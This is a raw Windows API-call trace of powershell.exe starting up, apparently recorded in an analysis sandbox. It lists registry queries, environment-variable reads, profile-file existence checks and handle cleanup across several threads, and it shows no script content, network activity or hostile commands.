	[0800.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.990] CoTaskMemFree (pv=0x1b742350) 
	[0802.002] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0802.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.003] CoTaskMemFree (pv=0x1b742350) 
	[0803.625] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b742460
	[0803.627] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b742570
	[0807.411] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0807.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.411] CoTaskMemFree (pv=0x1b742680) 
	[0807.413] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0807.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.413] CoTaskMemFree (pv=0x1b742680) 
	[0807.425] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc58 | out: phkResult=0x16dc58*=0x380) returned 0x0
	[0807.425] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbdc, lpData=0x0, lpcbData=0x16dbd8*=0x0 | out: lpType=0x16dbdc*=0x1, lpData=0x0, lpcbData=0x16dbd8*=0x56) returned 0x0
	[0807.425] CoTaskMemAlloc (cb=0x5a) returned 0x1b737220
	[0807.425] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbac, lpData=0x1b737220, lpcbData=0x16dba8*=0x56 | out: lpType=0x16dbac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dba8*=0x56) returned 0x0
	[0807.425] CoTaskMemFree (pv=0x1b737220) 
	[0807.425] RegCloseKey (hKey=0x380) returned 0x0
	[0807.426] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc58 | out: phkResult=0x16dc58*=0x380) returned 0x0
	[0807.426] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbdc, lpData=0x0, lpcbData=0x16dbd8*=0x0 | out: lpType=0x16dbdc*=0x1, lpData=0x0, lpcbData=0x16dbd8*=0x56) returned 0x0
	[0807.426] CoTaskMemAlloc (cb=0x5a) returned 0x1b737220
	[0807.426] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbac, lpData=0x1b737220, lpcbData=0x16dba8*=0x56 | out: lpType=0x16dbac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dba8*=0x56) returned 0x0
	[0807.426] CoTaskMemFree (pv=0x1b737220) 
	[0807.426] RegCloseKey (hKey=0x380) returned 0x0
	[0807.429] CoTaskMemAlloc (cb=0x20c) returned 0x1b739300
	[0807.429] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b739300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0807.431] CoTaskMemFree (pv=0x1b739300) 
	[0807.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0807.431] CoTaskMemAlloc (cb=0x20c) returned 0x1b739300
	[0807.431] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b739300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0807.431] CoTaskMemFree (pv=0x1b739300) 
	[0807.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0807.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0807.434] SetErrorMode (uMode=0x1) returned 0x1
	[0807.434] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dbc0 | out: lpFileInformation=0x16dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0807.435] SetErrorMode (uMode=0x1) returned 0x1
	[0807.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0807.435] SetErrorMode (uMode=0x1) returned 0x1
	[0807.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dbc0 | out: lpFileInformation=0x16dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0807.435] SetErrorMode (uMode=0x1) returned 0x1
	[0807.435] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0807.435] SetErrorMode (uMode=0x1) returned 0x1
	[0807.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dbc0 | out: lpFileInformation=0x16dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0807.435] SetErrorMode (uMode=0x1) returned 0x1
	[0807.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0807.436] SetErrorMode (uMode=0x1) returned 0x1
	[0807.436] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dbc0 | out: lpFileInformation=0x16dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0807.436] SetErrorMode (uMode=0x1) returned 0x1
	[0807.439] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0807.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.439] CoTaskMemFree (pv=0x1b742680) 
	[0807.443] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0807.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.443] CoTaskMemFree (pv=0x1b742680) 
	[0808.173] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0808.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.173] CoTaskMemFree (pv=0x1b742680) 
	[0808.176] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0808.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.176] CoTaskMemFree (pv=0x1b742680) 
	[0808.181] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0808.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.182] CoTaskMemFree (pv=0x1b742680) 
	[0808.183] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8
	[0808.183] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a4
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0808.184] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0808.187] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0808.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.187] CoTaskMemFree (pv=0x1b742680) 
	[0808.188] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0808.188] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16dda0 | out: lpMode=0x16dda0) returned 1
	[0808.189] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0808.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.189] CoTaskMemFree (pv=0x1b742680) 
	[0808.192] SetEvent (hEvent=0x318) returned 1
	[0808.193] SetEvent (hEvent=0x3a8) returned 1
	[0808.193] SetEvent (hEvent=0x3a4) returned 1
	[0808.193] SetEvent (hEvent=0x328) returned 1
	[0808.194] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0808.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.195] CoTaskMemFree (pv=0x1b742680) 
	[0808.195] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daf8 | out: phkResult=0x16daf8*=0x3b0) returned 0x0
	[0808.195] RegQueryValueExW (in: hKey=0x3b0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da7c, lpData=0x0, lpcbData=0x16da78*=0x0 | out: lpType=0x16da7c*=0x0, lpData=0x0, lpcbData=0x16da78*=0x0) returned 0x2

Thread:
	id = 690
	os_tid = 0x15b0


Thread:
	id = 712
	os_tid = 0x1614


Thread:
	id = 1070
	os_tid = 0x14a0


Thread:
	id = 1077
	os_tid = 0x1838


Thread:
	id = 1097
	os_tid = 0x15fc


Thread:
	id = 1117
	os_tid = 0x16dc


Thread:
	id = 1126
	os_tid = 0x112c

	[0571.751] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0697.210] RegCloseKey (hKey=0x318) returned 0x0
	[0697.210] RegCloseKey (hKey=0x314) returned 0x0
	[0697.210] RegCloseKey (hKey=0x310) returned 0x0
	[0770.893] LocalFree (hMem=0x2a7310) returned 0x0
	[0770.893] RegCloseKey (hKey=0x328) returned 0x0
	[0770.893] LocalFree (hMem=0x2a7340) returned 0x0
	[0770.893] CloseHandle (hObject=0x318) returned 1
	[0770.894] CloseHandle (hObject=0x13) returned 1
	[0770.894] CloseHandle (hObject=0xf) returned 1
	[0783.700] RegCloseKey (hKey=0x318) returned 0x0
	[0800.089] RegCloseKey (hKey=0x39c) returned 0x0
	[0800.089] RegCloseKey (hKey=0x398) returned 0x0
	[0800.090] RegCloseKey (hKey=0x394) returned 0x0
	[0800.090] RegCloseKey (hKey=0x390) returned 0x0
	[0800.090] RegCloseKey (hKey=0x38c) returned 0x0
	[0800.090] RegCloseKey (hKey=0x388) returned 0x0
	[0800.091] RegCloseKey (hKey=0x384) returned 0x0
	[0800.091] RegCloseKey (hKey=0x35c) returned 0x0
	[0800.091] RegCloseKey (hKey=0x3b8) returned 0x0
	[0800.091] RegCloseKey (hKey=0x3b4) returned 0x0
	[0800.092] RegCloseKey (hKey=0x37c) returned 0x0
	[0800.092] RegCloseKey (hKey=0x378) returned 0x0
	[0800.092] RegCloseKey (hKey=0x374) returned 0x0
	[0800.092] RegCloseKey (hKey=0x370) returned 0x0
	[0800.093] RegCloseKey (hKey=0x36c) returned 0x0
	[0800.093] RegCloseKey (hKey=0x368) returned 0x0
	[0800.093] RegCloseKey (hKey=0x364) returned 0x0
	[0800.094] RegCloseKey (hKey=0x360) returned 0x0
	[0800.094] RegCloseKey (hKey=0x3b0) returned 0x0
	[0800.094] RegCloseKey (hKey=0x350) returned 0x0
	[0800.094] RegCloseKey (hKey=0x34c) returned 0x0
	[0800.095] RegCloseKey (hKey=0x348) returned 0x0
	[0800.095] RegCloseKey (hKey=0x344) returned 0x0
	[0800.095] RegCloseKey (hKey=0x340) returned 0x0
	[0800.095] RegCloseKey (hKey=0x33c) returned 0x0
	[0800.096] RegCloseKey (hKey=0x338) returned 0x0
	[0800.096] RegCloseKey (hKey=0x334) returned 0x0
	[0800.096] RegCloseKey (hKey=0x3ac) returned 0x0
	[0800.096] RegCloseKey (hKey=0x318) returned 0x0
	[0800.097] RegCloseKey (hKey=0x328) returned 0x0
	[0800.097] RegCloseKey (hKey=0x3a8) returned 0x0
	[0800.097] RegCloseKey (hKey=0x3a4) returned 0x0
	[0800.097] RegCloseKey (hKey=0x380) returned 0x0
	[0800.098] RegCloseKey (hKey=0x3bc) returned 0x0
	[0893.081] RegCloseKey (hKey=0x3b0) returned 0x0
	[0922.798] CertFreeCRLContext (pCrlContext=0x1cdec480) returned 1
	[0922.799] CertFreeCRLContext (pCrlContext=0x1b771e70) returned 1
	[0922.800] CloseHandle (hObject=0x4d0) returned 1
	[0922.800] CloseHandle (hObject=0x374) returned 1
	[0922.801] CertCloseStore (hCertStore=0x2f64e0, dwFlags=0x0) returned 1
	[0922.801] CertFreeCRLContext (pCrlContext=0x1b771e70) returned 1
	[0922.801] CloseHandle (hObject=0x4c0) returned 1
	[0922.802] CloseHandle (hObject=0x4bc) returned 1
	[0922.803] CloseHandle (hObject=0x46c) returned 1
	[0922.803] CertFreeCRLContext (pCrlContext=0x1b771ef0) returned 1
	[0922.803] CloseHandle (hObject=0x468) returned 1
	[0922.805] CloseHandle (hObject=0x414) returned 1
	[0922.806] CloseHandle (hObject=0x410) returned 1
	[0922.806] CertFreeCRLContext (pCrlContext=0x1cdec500) returned 1
	[0922.806] CloseHandle (hObject=0x3a0) returned 1
	[0922.807] CloseHandle (hObject=0x39c) returned 1
	[0922.807] CloseHandle (hObject=0x398) returned 1
	[0922.808] CloseHandle (hObject=0x394) returned 1
	[0922.808] CloseHandle (hObject=0x390) returned 1
	[0922.809] CloseHandle (hObject=0x384) returned 1
	[0922.809] CloseHandle (hObject=0x35c) returned 1
	[0922.809] CloseHandle (hObject=0x3b8) returned 1
	[0922.810] CloseHandle (hObject=0x3b4) returned 1
	[0922.810] CloseHandle (hObject=0x378) returned 1
	[0922.810] CloseHandle (hObject=0x37c) returned 1
	[0922.811] CloseHandle (hObject=0x3b0) returned 1

Thread:
	id = 1186
	os_tid = 0x16d8


Thread:
	id = 1713
	os_tid = 0x2010

	[0809.084] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0809.090] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0809.095] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.095] CoTaskMemFree (pv=0x1b742680) 
	[0809.096] VirtualQuery (in: lpAddress=0x1c75de20, lpBuffer=0x1c75ece0, dwLength=0x30 | out: lpBuffer=0x1c75ece0*(BaseAddress=0x1c75d000, AllocationBase=0x1bdd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0809.101] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.101] CoTaskMemFree (pv=0x1b742680) 
	[0809.104] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.104] CoTaskMemFree (pv=0x1b742680) 
	[0809.107] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.109] CoTaskMemFree (pv=0x1b742680) 
	[0809.965] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.965] CoTaskMemFree (pv=0x1b742680) 
	[0809.968] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.968] CoTaskMemFree (pv=0x1b742680) 
	[0809.970] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.970] CoTaskMemFree (pv=0x1b742680) 
	[0809.976] VirtualQuery (in: lpAddress=0x1c75e0d0, lpBuffer=0x1c75ef90, dwLength=0x30 | out: lpBuffer=0x1c75ef90*(BaseAddress=0x1c75e000, AllocationBase=0x1bdd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0809.977] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.977] CoTaskMemFree (pv=0x1b742680) 
	[0809.979] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.980] CoTaskMemFree (pv=0x1b742680) 
	[0809.980] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.980] CoTaskMemFree (pv=0x1b742680) 
	[0809.981] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.981] CoTaskMemFree (pv=0x1b742680) 
	[0809.986] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0809.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.986] CoTaskMemFree (pv=0x1b742680) 
	[0811.982] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.982] CoTaskMemFree (pv=0x1b742680) 
	[0811.985] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.985] CoTaskMemFree (pv=0x1b742680) 
	[0811.986] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.986] CoTaskMemFree (pv=0x1b742680) 
	[0811.989] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.989] CoTaskMemFree (pv=0x1b742680) 
	[0811.990] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.990] CoTaskMemFree (pv=0x1b742680) 
	[0811.992] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.992] CoTaskMemFree (pv=0x1b742680) 
	[0811.994] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0811.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.994] CoTaskMemFree (pv=0x1b742680) 
	[0813.407] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0813.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.407] CoTaskMemFree (pv=0x1b742680) 
	[0814.630] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0814.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.630] CoTaskMemFree (pv=0x1b742680) 
	[0814.634] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0814.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.634] CoTaskMemFree (pv=0x1b742680) 
	[0814.638] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0814.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.639] CoTaskMemFree (pv=0x1b742680) 
	[0814.642] CoTaskMemAlloc (cb=0x104) returned 0x1b742680
	[0814.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0814.642] CoTaskMemFree (pv=0x1b742680) 
	[0863.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c75daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0863.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c75d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0863.098] CoTaskMemAlloc (cb=0x20c) returned 0x1b73ab10
	[0863.098] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b73ab10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0863.098] CoTaskMemFree (pv=0x1b73ab10) 
	[0863.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c75db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0864.048] GetCurrentProcess () returned 0xffffffffffffffff
	[0864.048] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c75da68 | out: TokenHandle=0x1c75da68*=0x374) returned 1
	[0864.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c75d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0864.054] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c75db10 | out: lpFileInformation=0x1c75db10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0876.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c75d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
